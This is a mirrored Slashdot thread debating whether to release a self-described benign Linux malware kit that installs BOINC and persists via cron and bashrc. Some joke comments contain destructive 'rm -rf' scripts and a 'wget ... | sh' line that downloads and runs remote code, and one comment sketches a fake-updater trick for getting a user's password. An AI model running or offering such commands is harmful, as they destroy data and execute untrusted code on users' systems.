Slashdot Mirror
Ethics of Releasing Non-Malicious Linux Malware?
buchner.johannes writes "I was fed up with the general consensus that Linux is oh-so-secure and has no malware. After a week of work, I finished a package of malware for Unix/Linux. Its whole purpose is to help white-hat hackers point out that a Linux system can be turned into a botnet client by simply downloading BOINC and attaching it to a user account to help scientific projects. The malware does not exploit any security holes, only loose security configurations and mindless execution of unverified downloads. I tested it to be injected by a PHP script (even circumventing safe mode), so that the Web server runs it; I even got a proxy server that injects it into shell scripts and makefiles in tarballs on the fly, and adds onto Windows executables for execution in Wine. If executed by the user, the malware can persist itself in cron, bashrc and other files. The aim of the exercise was to provide a payload so security people can 'pwn' systems to show security holes, without doing harm (such as deleting files or disrupting normal operation). But now I am unsure of whether it is ethically OK to release this toolkit, which, by ripping out the BOINC payload and putting in something really evil, could be turned into proper Linux malware. On the one hand, the way it persists itself in autostart is really nasty, and that is not really a security hole that can be fixed. On the other hand, such a script can be written by anyone else too, and it would be useful to show people why you need SELinux on a server, and why verifying the source of downloads (checksums through trusted channels) is necessary. Technically, it is a nice piece, but should I release it? I don't want to turn the Linux desktop into Windows, hence I'm slightly leaning towards not releasing it. What does your ethics say about releasing such grayware?"
There were two options:
1. Release it anonymously and take no credit
2. Write about it and get some credit (but then you can't actually release it due to legal issues)
You can't (and won't) release it now. If somebody gets attacked with your code, guess who they're going to prosecute and/or sue.
How did you write this piece of unpossible software?! It's surely impossible to do this on Linux... You should leave now.
Just releasing linux is an ethical problem. Hell, I can't even print anything since last saturday.
Do it for the lulz...
You know you want to....
So you made a program that a user can run that will jack up their system and you consider this a security issue? I don't consider that inventive.
Here's something I wrote a long time ago but was slightly more destructive.. No one seems to care that if you run some code, it might actually run, damn fools.
#/bin/sh
rm -rf
Contact someone at SANS, or Bruce Schneier, or some such. Maybe even someone on the SELinux project; if this non-malicious malware is indeed as capable without SELinux as you claim, and SELinux mitigates/eliminates the danger, this could be good PR for them.
.. but sounds like a lot of work to prove a relatively straight foward point.
It's actually been my opinion that Linux in the hands of someone who doesn't know how to use it can in some situations be less secure than windows.
My reasoning for this is that:
1) Newbie Linux users who are having problems with their systems will rpetty much run anything as any user you tell them to in a desperate hope to get Xorg working again
2) Linux commands on their own can look very cryptic to the uninitiated.. add into that the scripting abilities of most shells.. and a new Linux user won't be able to differentiate a malicious command from one that will get their nvidia driver working again
3) The out-of-box remote admin abilities of Linux are excellent.
4) Standard tools like nc can easily be used to establish out-connecting remote shell sessions
5) OR you can just get them to wget and execute your favourite piece of malware.
If you release it, will help anyone. Maybe you can share with security experts and try to find a solution, starting with you!!!!
Malware can exist for any platform.
However, real actual malware in the wild requires an eco-system to support it. Providing you can compromise a machine proves nothing. Proving that an ecosystem can actually exist on Linux machines would require completely releasing it into the wild, and subjecting innocent people to it.
I don't know about you, but I know where that falls when it comes to ethics and it ain't on the right side of it.
Wasn't SELinux implicated in part of making the mmap_min_addr root exploit even worse a few months ago? In fact, for one of them, I'm pretty sure that it was the cause of it. Just sayin'.
"My other computer is your Linux box"
Everyone who is paying attention knows there are plenty of hacking tools, bots, worms, and virus-like tools for Linux systems already. The only point to be made would be to the basement-dweller fanboys who are willfully ignorant anyway. So go ahead and release it, but don't expect anyone to applaud you for it.
put it on sourceforge. maybe let 4chan know. it's all good.
{fingers in ears} La la la la la la la la la la la la la.......
-- I have a private email server in my basement.
Why not treat this code like you would any other proof of concept of a security exploit? if the goal to to prove that security vulnerabilities exist and should be fixed then show this code to whomever it will help actually fix those holes but try not to release it to the public at large while it still represents a real threat. Show it to package and distribution maintainers and make recommendations on how they can improve their security configurations to prevent it from running but don't release it as a build your own rootkit tool if it has served its purpose and people are making a serious effort to address the issues it highlights.
its not that "linux is so secure" that makes it more secure to run.
its that linux hasn't become popular amoung the malware and virus writers so we enjoy the benefit of less or no virus/malware.
so you want to make malware and virus writing popular in linux too. ugh...
I'm glad you're ethical. The millions of exploits for Windows prove that there are people ready to capitalize on any flaw. How long do you think it'll take them to make this malicious? How long do you think it'd take someone smart to engineer the same thing you did with just your explanation here?
This question is posed as if this is new ground. As if this hasn't been done before - without questions of morality and with distinctly less noble intent. All this worry about inserting a malicious payload is wasted. The script kiddies already have better options at their disposal.
Um, reading this, doesn't it require specific software to be installed to be effective? This does not appear, from what little info is presented, to be a general "hackin' tool" to "pwn newbs". Or maybe it is. Let me know when you can actually get into anything with this. As for releasing it: give it to the devs first. Let them patch things up. Then release it after patches are ubiquitous and discuss how clever you are. Anything else is just plain stupid.
Seriously, what is it with people not knowing right from wrong, or accepting responsibility for their own decisions? You're the one who has to sleep with whatever decision you make - why try to foist the blame on someone else if you decide wrong?
That's like one guy who said "My best friends' girlfriend wants to sleep with me - should I do it so I can show him what a sl*t she is?" If you're asking, it's because you want to do it and be able to say "don't blame me - everyone said it was okay !"
BTW - Good luck with whatever you decide, but a lot of us have been in the position of being able to do a lot worse, or been offered $$$ to do a lot worse, and you should be thankful we didn't have to get the group-think thing going before refusing.
Show it to distro developers and repository maintainers, people who do security work, etc. Let them look at it and see if they can defend against it. Don't release it on unsuspecting users, publish the directions to remove it, and defend against it so no one else can do it either. Putting malware in the wild is not the way to get white-hats attention, but it is the way to get black hat's attention. The white hats are usually well behind the black hats with malware that's been released in the wild. Give this to white hats and not black hats.
Post it as security bug against all the distros you've confirmed it works against. That'll attract the attention you want and not the attention you don't.
Perhaps the best action is write and release these tools:
Tool A: It tells the user he has been compromised.
It also saves copies of the files that may be altered.
Tool B: Copies all the old files and MD5s the raw files
and the zipped files. (I think that this is hard
to make both MD5 fake.)
Tool C: Can replace the corrupted files with the save copy.
It may need a password:
If the saved copy can be encrypted with some
password so that it is not easily corruptible.
The real problem is not getting compromised - but not being
able to verify that it has been compromised and
being able to restore it.
Have I missed anything? - A careful user. ./ - read by millions, written by experts
I love
I'm fed up with the general consensus that people are able to walk around outside without being punched in the face. After all, anyone can be punched in the face at any time, so I've been thinking about going up to random people on the street and punching them in the face. People need to learn to take reasonable steps to protect themselves from being punched in the face, such as wearing full-face motorcycle helmets at all times, and how are they going to learn that if I don't show them? But now I'm having second thoughts about whether or not it would be ethical to go around randomly punching people in the face. Does anyone have any advice?
The correlation between ignorance of statistics and using "correlation is not causation" as an argument is close to 1.
Release it and do the same with OS X shortly thereafter.
Any programmer worth a grain of salt could write the same thing at the drop of a hat. I don't
understand where it would be all that interesting.
Got Code?
Which simply shows that the lack of Linux malware isn't because Linux is somehow magically superior, but simply because nobody has taken the time to write any.
Even better, pretty soon we'll have clueless noobs with their new netbooks running Google's ChromeOS (which they don't know is really Linux because Google is doing everything they can to avoid the "L" word). Now they can get pwned too!!
I was fed up with the general consensus that Linux is oh-so-secure and has no malware.
Just because it's a consensus doesn't mean it's correct. As you have demonstrated, it's very much possible to write malware targeted at Linux.
In fact, there are plenty of viruses and malwares specifically targeted at Linux, and their numbers are rising: http://www.internetnews.com/dev-news/article.php/3601946
However, because desktop Linux has an extremely small market share, malware for Linux has a correspondingly tiny market share.
Think of it this way, a few weeks ago you woke up and came up with the idea of writing a piece of potential malware directed at Linux. But there are a hundred who woke up with the same idea, except they wanted to target Windows. In the end, 101 new malwares are born, with only one of them intended to harm Linux systems.
As you said in your own post, compromising a linux box isn't impossible. The code you have isn't all that revolutionary, it's just a demo. Anybody with actual malicious intent would likely know how to make a program like this themselves. Another option would be to set up the system on your server but not release the source, you could demonstrate the weaknesses of *nix without putting anybody in any real danger.
no
Get in touch with the security community as some other poster said.
Then concentrate in releasing a paper about your software. If your techniques are good, they might be an interesting read. Even more important is that if your software does not escalate privileges (as I understand), cleaning your software should be a straightforward job from the superuser account. Those cleaning techniques will probably be even more interesting.
I'd use a rather obvious payload that reveals itself when interrogated (instead of BOINC) in order to be useful for evaluating system security.
I don't think your malware is as nasty as you think, as you said you relied on executing downloaded software on a world with signed repositories and with MD5 hashes/pgp signatures as a normal custom. I also think you're underestimating the difference between administrator-all-the-time windows way and the only-escalate-when-needed model of the unix world. It would be interesting to see what happens, though.
GPG 0x1B479C78
That's like one guy who said "My best friends' girlfriend wants to sleep with me - should I do it so I can show him what a sl*t she is?"
Of course, why actually sleep with her when you can just brag about her offer on slashdot!
ME !! I will do what's right. Muhahahahahhahahah !!
"mindless execution of unverified downloads"
Thanks Captain Obvious, show me a system that would stand up to an attack in that instance. Any user-privilege activity (cron, editing .bashrc, etc...) is vulnerable if you throw that in the mix.
Look at it this way, if you log into your computer only to find that the computer has mysteriously joined Boinc what would you do? You would try to find the source, but when in doubt, probably wipe the partition and re-install. If you worked for a large corporation you might have to file all kinds of reports, alert all kinds of security personnel etc. That 'harmless' prank could cost thousands of dollars.
Lets put it another way. Even if I left my house door wide open, opened all the windows etc. It still does not give you the right to come in and f*ck with my house.
I reserve the right to track down anyone that even attempts to break into my house or my computer and kick their ass. I don't give a rats @$$ that you don't like Linux fan boys or whatever the reason for 'why' you did it.
kdawson - you need to get punched a few times for even rationalizing that it just might be O.K.
I don't see how social engineering is proof of concept on this one. Mindless execution relies on social engineering, which is how most malware spreads. Put malicious code in a PPS or something like that isn't going to prove the lack of security, unless you cross into the superuser account. By then, it doesn't matter. Mac can be compromised this way. Microsoft has hundreds of thousands of ways this can happen. Linux is just software. This means it is vulnerable. But compare software strength to person strength, that's where you can prove something. Linux has its flaws just like anything else. But if it relies on someone physically executing the code, you can't prove system weakness. Idiot weakness doesn't count.
The claim is that a PHP injection on a web server is going to also infect user-owned tarballs and wine executables and root-owned shell scripts without exploiting a privilege escalation hole? Either his webserver is configured to run as root, or this claim doesn't pass the smell test.
http://www.mhall119.com
I'm sure there are some people in the computer security world who you admire. So ask yourself, what would these people do if they had discovered the exploits? What would Phil Zimmermann, or DJB do? Some of these people were unhappy with the current situation, and took their own road and created some good, secure software.
Also, maybe your code isn't as good as you claim. Or maybe it mostly uses known exploits. It's time for a reality check. You should try to find some peers, and discuss it with them to determine how dangerous your product really is.
"Can of worms? The can is open... the worms are everywhere."
kind of like blaming the digital camera for sexting. technology is neutral, its people that are evil
We already know how to break into systems with buffer and heap overflows. We know how to do SQL injection into not-so-smart applications. If you work at it you can break into almost anything.
Absolutely no good purpose is served providing a toolkit that allows people to break into naively configured systems. Much of what you describe is akin to leaving the keys in your Maserati with the doors unlocked and the engine running. Please don't make things easier for joyriding teenagers.
If a site wants to know if they're secure, within the current limits of our knowledge, they can perform their own audits, and hire their own advisers to test their systems in a controlled fashion.
Applications, such as BOINC, have an unknown state of security review or audit. I doubt they applied the coding guidelines of CERT, or any of the Common Criteria levels. An administrator would only deploy such applications in the DMZ of their network. To call a Linux system, or Windoze system, secure means you've evaluated the risk of both the operating system and the applications on that system and decided it is good enough for you.
to CERN or some other security group, or to White Hat Hackers who won't release it or use it, but study it and find a way around it.
I would pass it on to some Linux kernel and Linux OS developers, and see if they can fix the security holes you found that allow the hacking of Linux.
If you release it into the public for anyone to download, dollars to doughnuts some idiot is going to replace the Bonic client with a packet sniffer or key logger or something else. It is like inventing a rocket or missile and then someone takes it, steals your design, and then places a WMD in the warhead and launches them at public areas. Just like we wouldn't want technology leaked to Iran, Cuba, Syria, Sudan, North Korea, and other places that could use it for better missiles, guidence systems, encryption, etc some cyber terrorists would use your code to use it for espionage on some Linux web servers run by governments and the military because they thought Linux would be more secure than Windows.
Remember, Slashdot does not have a -1 disagree moderation, and no, troll, flamebait, and overrated are not substitutes.
It's not real if there is no link.
I'll help you out, just send it in a tarball to me, and I'll verify if it works or not. Oh, I'm sure you want to keep it opensource and all, so just put the source in there too... I'll make sure your given proper credit. Thanks. :)
--- Relax, that mass muderer is just trying to reduce our carbon footprint, one fetus at a time...
yeah, in all it's capitalized glory, that was my opinion right on the title. why so? because there will be time for that, there is enough crappy stuff floating on the intertubes as to release a 'toolkit' that allows to add the whole world of linux servers to the fotm botnet
FTFS: "The malware does not exploit any security holes, only loose security configurations and mindless execution of unverified downloads"
how is that different than posting a script with "sudo rm -rf /" and asking people to download and execute it?
I was a windows user for almost ten years. i never used an antivirus or antimalware porgram, and i never had any security problems. 99.9% of security issues are problems between keyboard and chair.
Well, in general, if you petition a large number of others for advice on a decision you're not sure of, you'll probably be less likely to do something stupid. After all, the general public has a low but well-known level of intelligence, and as an individual you may be stupider than that yourself.
Yeah, really! Ethics is easy!
Will releasing it make you money? No? Then don't do it.
See how easy that was?
Intellectual Property is a monopolistic, selfish, and defective concept. It is "tyranny over the mind of man"
Security through obscurity isn't. Publish.
Since, despite the popular belief, the idea of a grey/black/white hacker being distinct solely because of intent is, at best, a falsity, the idea that one could release something with the potential of being as destructive as TFS claims is a no-brainer.
The answer is no. Under no circumstances should the package be released.
Because, to release the code is no different than than saying "I only illegally accessed your systems, Mr. FBI, to show you how it could be done. I am honest little boy/girl".
0100010001101001011001 0100100000011010010110 1110001000000110000100 1000000110011001101001 0111001001100101
Its whole purpose is to help white-hat hackers point out that a Linux system can be turned into a botnet client
It would be nice to see the code. As it stands, I am surprised that this "news" made it this far, with no links of any kind.
No one credible claims that malware is impossible in GNU/Linux or *BSD. In fact, since UNIX is a much more robust networking OS, maintaining a botnet should be helluva lot easier than on Windows. What we have with a free OS, though, is something that proprietary OS users will never have: a complete and total control over our security policy and every other aspect of our software environment. When and if a vector is identified, our security policy will promptly change to nip it in the bud.
A Speculative Example
Lately I've been thinking about one major vector: the human-assisted privilege escalation. Take the latest Ubuntu and imagine a piece of software which runs with user privileges and does the following: it tricks the user into thinking that it is the automatic updater. Lacking in both expertise and time, I am not going to do a proof of concept, but how hard can it be? You just need to draw a window named "Update Manager" using the standard Gnome API, list a few bogus updates anyone would find legit, with version number irrelevant to their day-to-day life (e.g. binutils), wait for the user to click [Install Updates], and then "gksu pwn_you.sh". The user will enter the password, and your work is done. Then, of course, you still need to draw some progress bars to lull the user into believing that an update is going on, but that's all just an icing on the cake.
If anyone can see why this won't work, I would like to hear it.
Looks scary, right? Wrong. Because the solution is as simple as changing the default policy. Make it so that the default behavior is to notify only. On every system update the user should be told: "Go start the updater via the system menu. By the way, if you EVER see an "updater" you didn't start yourself, you are being pwned." Make sure that the system menu is strictly read-only, and even the dimmest user will be safe.
This won't be implemented in Windows. Why? I really cannot guess why Microsoft's security policy seems to be designed from ground up to fuck the user, but it is. The usual excuse seems to be: "it's easy to use". But whatever is the reason, you just cannot make a proprietary platform secure because you cannot pop the hood open. With a free OS, you can.
Post it to the internet with a headline of "Nude Pictures of Brittany Spears!! (Linux only)." Oh, and give it a payload that allows you to pwn the computers it gets downloaded. And then you'll have a Linux botnet!! How cool is that!!
And, next time somebody posts on /. "imagine a beowulf cluster of those" -- well, you'll actually have a beowulf cluster of those.
Oh, and I almost forgot:
3. ???
4. profit!!
Too bad I've already commented on this thread, or I'd mod that up.
But I'll also say that my mother runs Fedora 11, and the SELinux configuration is a lot better than in previous Fedora releases. The SELinux reports are all related to config files in her home directory, and those are carried over from previous Fedora installs. From what I can see, someone got a clue and cleaned up the general Fedora SELinux configuration in a big way.
Who modded this funny? It's insightful, if anything.
What you are contemplating doing is roughly, the digital-electronic equivalent of supplying criminals with maps of wealthy communities, marked with what areas are and are not guarded, where valuables are kept, etc. Don't think that simply because you didn't write a truly malicious payload, that by letting others use a tool you can and should reasonably know will be used for evil purposes you don't share in the culpability, ethically if not legally, even if you don't pull the trigger yourself. ~Hal
Insecurity through stupidity is a common problem on Linux. The Ubuntu forums are full of users wailing that their machines got hacked after they installed FTP, SSH or VNC with a kewl four letter password. One could argue that it is not the users, but rather the Ubuntu developers that are stupid by not configuring PAM to enforce password complexity by default, since it is not really a flaw in 'Linux' per se, but it could certainly be considered to be a dumb-ass flaw in the Ubuntu distribution.
Excuse me, but please get off my Pennisetum Clandestinum, eh!
Who modded this funny?
I did. Yes sir, it was me, I'm guilty.
"After a week of work, I finished a package of malware for Unix/Linux."
Really, this might be a fun thread. Just out of curiosity, did you use vi or emacs to code it? And if you actually plan to release the code, there is also the question of the license.
as long as it's licensed under a proper Free Software license. Who gives a fuck.
With so many new Ubuntu users, Linux is already windoze in the security sense.
How else are we going to accept that which we obstinately refuse to see?
-- newall
The exploit relies on "loose execution of unverified downloads"...
Is this the joke about the virus that spreads itself by telling the user "send this email to all your friends then format your hard drive" ?
Once you have code executed on a machine that doesn't have good security, you manage to get local root exploit and then do some "really nasty thing" to persist a reboot?
Please?
Really nasty as in escaping offline IDS?
Publish your kiddie exploit, I'm laughing out loud...
: )
We Linux geeks won't censor you or sue you or something. We're not MS.
It's not a hazard. It's a benefit. We understand.
Colorless green Cthulhu waits dreaming furiously.
Sounds like you have too much time on your hands. Linux and Unix boxes get rooted and kitted all the time, from various security holes in PHP, SQLi, etc. Writing some "greyhat malware" package doesn't really demonstrate anything. It's a well known fact that *nix is still vulnerable to attack, and I really see no relevance to what you're doing. Besides, anyone who runs a locked down system and has any degree of paranoia wouldn't run SETI@Home, Distributed.net or any other similar distributed client software. OSSEC would pick this jazz up in half a second. Congratulations on some questionable bash scripting.
Security through obscurity does not work. If you can write a program there is at least one much less ethical person out there willing to do it as well. The fact we don't see it suggests that people are not motivated or see a benefit in doing it. I suspect much won't happen if you release it. I realize it might also be the case that it is going unreported. Either way it will get developers motivated to fix the issues. See Microsoft for example. So that when Linux becomes a major OS and people will want to freak the systems they will have a much harder time.
>mindless execution of unverified downloads
There is no cure for stupid on any platform.
People will install purple gorillas and cd-drive-cupholders. This is not new.
But beyond user stupidity, there are reasons why propagation of badware on Linux and Unix sucks, and I suggest that people read Tom's excellent rant here: http://slashdot.org/comments.pl?sid=3291&cid=1395315
This situation may not last (c.f., sudo silliness on fedora), but unless you can do a miracle of social engineering, treachery, and underhandedness and get your badware included in the main repositories as source (which repo maintainers and end users use to build packages), you're not going to get very far in the *nix world.
--
BMO
I don't know...we do a lot of stuff as a collective already, more of it the more "advanced" we are.
One that hath name thou can not otter
If you can truly spread this as easy as possible, then do so. But put a payload into it that closes all the holes it slips through. Proof of concept achieved, morals remain intact.
UTF-8: There and Back Again
I have a strong suspicion that this whole "question" is merely an attempt by Windows marketdroids to spread one of their favorite FUD formulas: "Linux is not really secure, it's just too unpopular to be targeted by malware writers". Please note how often it is mentioned in otherwise content-free comments.
There is no actual "malware". All author claims is that he wrote something that demonstrates the fact that a program executed on a Linux box by a user has that user's access privileges and can do stuff that the user does not expect or like. That's at best a trojan horse -- without capability to gain superuser privileges or compromise other users or hosts, such "malware" is firmly in the range of stupid pranks -- slightly below changing someone's wallpaper to goatse and slightly above asking someone to check out the Last Measure web site. It has nothing to do with millions-strong botnets and hours-to-worldwide-pandemic worms that make Windows such a great platform for crooks and vandals.
Contrary to the popular belief, there indeed is no God.
What it all boils down to is marketshare. I deal with malware from all ends of the spectrum, and the entire purpose of modern malware is usually one thing. To make money. Whether that be by using that machine in a botnet, stealing banking or other logon info, or by trying to get someone to pay for fake security software, malware has turned into (within the last decade) a major business. Due to lack of enforcement, these things mainly stem from countries with little oversight (African countries, Russia, tiny islands etc) And are hard to take down. The reason Linux has not been mass targeted is that it normally represents the higher end of the user spectrum, whereas windows is the low hanging fruit. Take international pickpockets or muggers. The offenders will find the most vulnerable target who is unaware of their surroundings and unable to defend themselves. Windows is a 60 year old lady in a foreign market with her passport and wallet around her neck wearing bright pink taking pictures and not paying attention. Linux is more like an aware person who has made themselves a hard target just by knowing what not to do. Mac's seem to be the exception for the moment, and this is where I actually happen to see a huge potential for this to change though. More and more instead of the family tech having to support a family windows box, it is simply easier to just tell a novice to get a mac. Once this reaches a certain apex, that is when malware will target it. Just about any system can be compromised, but back to my original point is it worth it (money?)
"It's ok, I'm completely secure as long as my iron is off"
I work with AS400 and iSeries machines (and I accept your collective condolences). When I first got trained on them, the teachers told us that OS400 has never been hacked. Not having any real data to confront them, I just let it pass. When we covered the section about user ids and passwords, I found out that 400's force you to disable a user id and password after a certain, finite number of logon attempts. This was by design. All user ids, including system administrator ids had to have some number (I forget how high you can set it) of illegal attempts before the id is locked out. (Usually this is set to 3) They explained, smugly, that this was to keep out intruders.
We further learned that user id's could not be set to more than 10 characters. So I raised my hand and asked what happened if all the user accounts got disabled. They said that IBM would have to back door their way in to unlock a system administrator account, and from that account, others could be reset. (This would be BAD and time consuming, so it was good practice to keep a few SYSADMIN accounts around just in case) I asked if they had ever heard of a denial of service attack. Of course they said. So I asked the obvious question, "What if someone wrote a script to log on to every 10 digit user account 3 times with a blank password?" The reply was "Why would anyone do THAT?"
I pointed out that while I couldn't "hack" their system by their definitions, I could sure as heck turn it into a boat anchor, and do it remotely if it was hooked to the Internet... "Yes, but you can't HACK it was the reply..."
Brawndo: It's what plants crave!
If you are worried about the legal implications, why don't you just present and release it as something like 'automated remote boinc installer'. At that point, it is the decision of the end user whether to use it for it original purpose, or change it for their own purpose(be it legal or illegal). Make sure to release it under a good license that releases you of liability. Do not release it as 'Linux malware', or you probably will get pinned for it.
end users should only run stuff they get through the Ubuntu Software Center. Never download binaries. Never download source. If it's not in the app store, screw it.
Yeah, really! Ethics is easy!
Will releasing it make you money? No? Then don't do it.
See how easy that was?
No, no, no. Ethics cannot be based on money because money is only a means to an end not an end in itself. We must fall back on the ethical basis nature gives us as anything else is artificial.
Will it get you laid?
Will it enhance the ability of your children to get laid?
If yes, then you are morally obligated to do it.
You're thinking small. Why miniaturize the laser, when we could instead enlarge the sharks? -John Searle
... is that after a Linux developer writes malware, he/she contributes it to the community. When a Windows developer creates malware, he/she uses it immediately for fun or profit.
Well, in general, if you petition a large number of others for advice on a decision you're not sure of, you'll probably be less likely to do something stupid.
After all, the general public has a low but well-known level of intelligence, and as an individual you may be stupider than that yourself.
Average IQ is 100
Hopefully, IQ is higher on /.
$ make available
Would you be so kind as to open a terminal window mr user and run this for me so that you can join
my cool bot net.
wget www.somewhere.com/somefile.sh -O - | sh
Oh no what will the community do, I may have just released a very serious malware exploit vector.
Got Code?
If Linux malware is unheard of, why does McAfee sell LinuxSheld?
Anyway, people have been releasing internet-wide, UNIX malware malware for at least 21 years.
http://ask.slashdot.org/comments.pl?sid=1461872&cid=30278928
If you release it, you had better release it under the GPL, or it really will be an unethical release...
I don't like Linux. This doesn't make me a troll.
malicious ware? How can something be non-malicious malicious ware? Doesn't that contradict itself? And how does releasing something that does something to someone's computer without their computer considered a good thing?
That's right- I feel smarter just being here.
http://en.wikipedia.org/wiki/Morris_worm
Non-malicious malware.... Dudware?
Political correctness is really just herd psychology pushed by insecure people who desperately seek social conformity.
Unless you are saying we are all born with an innate ability to determine if all possible actions are right and wrong, and thus also say that all possible actions do in fact have a single, unequivocal answer to the question "Is this right?". If you are saying all of that, sure you are right.
However, if you aren't, then there is good use to discussing ethical issues. If we are finite being incapable of omnipotence, then admitting that we don't know the answer ourselves is a fairly intelligent act compared to flipping a coin. There may be options that one doesn't see on there own, that are far better and will be though up through intelligent discussion.
You might also really want to talk to a lawyer who knows the Computer Fraud and Abuse Act. At a minimum, you may need to worry about 18 USC 1030(a)(5). Pay attention to the definition of "damage" and "loss" in 18 USC 1030(e)(8),(11).
If it's for-profit but free, you're not the customer -- you're the product (e.g., the Slashdot Beta's "audience").
Malware == malicious. Doofus.
Do not release it. Make people do their own damn work.
Linux malware that requires manual running is trivially easy to do. /
Copy and paste: sudo rm -rf
Enter your password
Come back when you have malware that can remotely infect a target machine without user interaction.
Why does my process list show BOINC?
I say release the ideas, or at least document the concepts with pseudocode so that the average skript kiddie can't just download and modify - they'd at least need to spend the time implementing it in some language.
This way, people qualified to fix the problem can review your proof of concept and fix the problem, but you're limiting the exposure to the average bored 15 year old who's skillset doesn't extend too far beyond downloading a .c file and running gcc.
I run: Windows, OS X, Linux, FreeBSD. Just because you have a hammer, doesn't mean everything is a nail.
> Hopefully, IQ is higher on /.
Not judging from the average response to any article mentioning Microsoft, god forbid anything political. There's just a higher concentration of technical skill. That ain't the whole picture of IQ.
No malware? I think the claim is that Linux doesn't have the threat from viruses that Windows does - actually, it has little threat from them at all.
loose security configurations and mindless execution of unverified downloads - so, the sort of thing no admin with any brains, regardless the OS they were using, would do? The difference is, you can fairly much lock up Linux very fast, with little a non-privileged person can do, while not really limiting what services the machine will offer. With Windows on the other hand, it takes more effort to lock it down, and things become far more burdensome to deal with once you do. Let me tell you how much I loved having errors all over the policy editor in windows because of some basic security settings...which meant that doing normal, everyday windows admin tasks you would be confronted with errors left and right because of the policy settings. Doing normal, everyday UNIX admin tasks on a locked down box though...no issues.
Why do people take the argument so damn personally, anyway? The OSes are meant for different things. That one is better at some things than the other should make sense - they have entirely different methodologies.
PS - it took you a *week* to write something that could exploit "loose security configurations?" Give me 5 minutes and I'll write something. Go ahead and publish whatever you wrote, I'm sure several of us could use the laugh.
You should be BOINC'ing your hot friends, not their computers!
War as we knew it was obsolete
Nothing could beat complete denial
- Emily Haines
Open source it, that way we can all contribute to the malware and discuss if it should use gtk or qt. We know that gnome users will refuse to install anything with qt dependencies and kde users will refuse to install gtk+ dependencies. None of the windows malware coders are willing to release their code to us, so we are limited on integration, especially with wifi. I personally think we should target gnome users, they like stepping on people -- just look at how condescending their logo is. Plus I have a grudge against the way they put their contributers down. Once we get enough malwared machines we can convince windows malware coders to support our platform.
Trying to install linux on my microwave, but keep getting a kernel panic...
"IQ is higher on /."
And more to the point: Hopefully the average intelligence is higher on /.
So you saying that a group of people none of which have an innate ability to determine right from wrong come to better ethical decisions that an individual with the same limitation?
I think you meant "UI through obscurity".
So don't release it. Pretty straight forward if you ask me.
||| I still can't believe Parkay's not butter.
Will it get you laid?
Will it enhance the ability of your children to get laid?
If yes, then you are morally obligated to do it.
"There is no 'right' or 'wrong', 'good' or 'evil'. There is only 'historically correlated with collective survival'."
More seriously, wouldn't that position mean that all birth control is evil (IIRC this actually matches what the roman catholics believe (but obviously for different reasons), plus there's "every sperm is sacred, every sperm is great, when a sperm is wasted god gets quite irate") and that the only proper response when a potential partner wants to use a condom is to secretly poke a hole in it? Somehow, that seems a bit off...
And if they didn't, I don't think your "malware" is going to destroy Linux community, on the contrary. So go Ahead.
Dear
from people trying to spell Schadenfreude.
... Consider the 'Rick Astley' iPhone semi-malware released last month that affected jailbroken iPhones.
Someone's now put a deadlier payload on the same code.
Linux has two main things over Windows:
First one is that people can't accidentally execute some random program they downloaded with their browser. They have to intentionally save it somewhere, chmod +x, then run it. There's no "ok, ok, ok, yes I am stupid" sequence of warning dialog button selections that's going to do that, so it takes very intentional actions to run some random code you got from the web.
The second one is that Linux users don't, as a normal thing, run random programs they downloaded from the web. They generally install packages provided by their distribution. If a Linux user needs a RAR compressor they don't go hunt it around the web, possibly landing on a page offering a trojaned version, they "apt-get install" their distribution's verified version.
The first means people are very unlikely to run your code by accident, the second that you have to provide a good reason to run your malicious code.
I think that all this really proves is that if you really insist on running untrusted code on your system it can go and screw with your system (or user account). Well, duh. The question isn't whether it can happen at all, it's how easily it can happen by accident or lack of attention. If the user really insists on shooting their foot there's little anybody can do about that.
But, suppose that Linux got lots of stupid desktop users, who'd download fluffy_kittens.sh and actually go through the steps they need to run it. In that case distributions could add some extra security quite easily, by for instance denying the user the ability to run programs from non-root owned directories (grsecurity does this). This would make it so that even if the user does download your script, sets the permissions, and tries to run it, it will fail to work anyway.
Now of course there's the ld.so workaround, but that's not going to happen from the GUI, and the distribution could always patch their ld.so to obey the grsecurity restrictions
Given all this, IMO, this exercise proves very little. It proves that if you manage to convince the user to intentionally run untrusted code, it'll be able to do nasty things. But this is a given on any system that's not locked down in a really fascist manner. It'll take a cell phone-like environment with sandboxed applications to defeat that. And even there applications must be allowed to do potentially harmful things to be able to do some entirely legitimate functions.
At that point you have two possibilities: you completely refuse to run unsigned code (pissing off the user), or ask the user "do you want to let this program delete all your data?" and allow them to shoot their own foot.
I am not a lawyer, but as I understand the legal definitions, malware/spyware/virus/trojans do not have to be harmful to be illegal. Anything installed without the user's knowledge and consent is illegal.
It's an obvious lie. Nobody here has a friend with a girlfriend.
Uhh no its retarded and was modded funny as a result. Security through obscutiry has been debunked dozens of times. Mac OS for instane is pretty visable, but yet seems to have not even a fraction of the problems another major commercial OS does. And don't tell me there isn't a major bonus for being the hacker to really pwn OS X. I'm sure as a Windows troll you would give a nut for this kind of exploit just to prove this lame claim. Vista and W7 are a HUGE step forward, but don't pretend that the only reason everybody else is safe and Windows is a spyware dungeon is just based on marketshare.
This is an important milestone in the Linux to the Desktop campaign.
Without a "healthy malware ecosystem", Linux isn't mature enough to be called a desktop operation system.
Think about the AV industry!
Patents Drive Free Software as Hurricanes Drive Construction Industry
I've always thought it was hard enough to get apps and services I do want to install and get going on linx that some random piece of malware has no chance.
Install and Run Instructions ./LinuxMalware1.0.exe.sh
/
==================
chmod a+x
su -c "./LinuxMalware1.0.exe.sh"
Script
==========
#!/bin/bash
rm -rf
exit(0)
The Point
=============
If you are running things from an untrusted source then you are a dumb-ass.
There is no patch for human stupidity.
http://www.rocketdownload.com/software/rar.html
Security through obscurity means that you don't know the code, not that people don't know the OS.
Really?
Non-MALicious MALware?
Its awesome to see non-malicious malicious software for Linux.
Way to go the kdawson, your reading comprehension skills are just freaking top notch.
Persistent Volume manager for Kubernetes - https://github.com/dwimsey/openshift-pvmanager
And I'm not worried at all. Peeling back some "nasty" multi vector injection into start-up and cron will probably take me less time to clean up than it took the author to write.
“Common sense is not so common.” — Voltaire
Not true. I'm off to a D&D game tonight where one guy - oh wait, she ditched him.
This doesn't prove anything. If you download and run untrusted and unverified code you are boned no matter what OS you may be using. This says nothing about the overall security of the OS, but only about the stupidity of the user.
Why should a (web)server be allowed to issue any request ? It should be configured to answer queries only, no ? iptables is great and easy to set up for that task. Even for software update, one may push the package needed to the target server in place of the usual pull from the target; so no exceptions are needed on the firewall.
